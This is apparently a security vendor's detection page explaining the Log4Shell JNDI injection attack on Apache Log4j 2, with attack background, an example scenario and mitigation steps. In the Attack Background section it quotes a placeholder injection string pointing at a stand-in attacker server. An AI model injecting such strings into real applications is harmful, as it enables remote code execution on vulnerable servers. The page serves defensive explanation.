ExtraHop named a Leader in the 2025 Forrester Wave™: Network Analysis And Visibility Solutions

Search
  • Platformchevron right
  • Solutionschevron right
  • Modern NDRchevron right
  • Resourceschevron right
  • Companychevron right

DETECTION OVERVIEW

Log4Shell JNDI Injection Attempt

Risk Factors

The Log4Shell vulnerability in Apache Log4j 2 is well known, affects thousands of applications, and is trivial to exploit. An attacker can install malware or gain control of a device.

Category

Exploitation
Detection diagram
Next in Exploitation: Log4Shell JNDI Injection Attempt by a Scanner

Attack Background

Apache Log4j is an open source logging utility that is commonly built into enterprise applications and web servers. Log4j 2 supports Java Naming and Directory Interface (JNDI), which provides the ability to make calls across distributed applications to retrieve a Java class file (essentially executable code). JNDI calls can be performed over several protocols, such as LDAP, DNS, RMI, IIOP, and more. Log4j 2 has a vulnerability in how it performs JNDI calls with untrusted data. To exploit this vulnerability, an attacker injects a malicious JNDI string into any piece of data that can be logged by a victim application. The JNDI string has a syntax similar to ${jndi:[protocol]://[attackerserver.com]/[path]}; although the attacker can modify string values to evade detection. The victim performs a JNDI call to an attacker-controller server, which then forces the victim to download and run a malicious Java class file.

The diagram shows one example scenario. An attacker injects a JNDI string with a malicious LDAP server hostname into the user agent field of an HTTP request [1]. After the victim logs the user agent information, Log4j 2 extracts the hostname from the JNDI string and the victim communicates with the malicious LDAP server [2]. The LDAP server responds by sending the victim a path or location to a malicious Java class file on another attacker-controlled server. The victim downloads the class file from that server and runs the malicious code [3].

Mitigation Options

Refer to the CISA Emergency Directive 22-02 for mitigation information

Update all applications affected by Log4Shell vulnerability

Enable decryption to analyze inbound and outbound data

Review all unexpected outbound connections from internet-facing web servers running Java

MITRE ATT&CK ID

Associated content

Announcing The Forrester Wave™: Network Analysis And Visibility Solutions, Q4 2025

Network analysis and visibility solutions remain underrepresented in enterprises. Find out why in this preview of a new Wave report.

Report

ExtraHop® Named a Leader in First-Ever Gartner® Magic Quadrant™ for Network Detection and Response — ExtraHop

ExtraHop® Named a Leader in First-Ever Gartner® Magic Quadrant™ for Network Detection and Response

News

Detections

Visit this resource for more information.

Docs

The 2025 ExtraHop Global Threat Landscape Report: The Alarming Reality of Threat Actor Dwell Time and Deeper Network Access — ExtraHop

This analysis exposes the critical link between an organization's lack of internal visibility and the escalating cost of compromise, demanding an urgent re-evaluation of how core business assets are protected.

Blog

ExtraHop RevealX MITRE ATT&CK Coverage 2024 — ExtraHop

Learn why you need to be wary of the claims certain network detection and response providers make about their coverage against the MITRE ATT&CK framework.

Blog

MITRE ATT&CK - Network Detection & Response with RevealX — ExtraHop

Learn how NDR from RevealX helps security teams detect and investigate more adversary TTPs in the MITRE ATT&CK framework than rule-based tools.

External
Periodic Table of Use Cases

What else can RevealX do for you?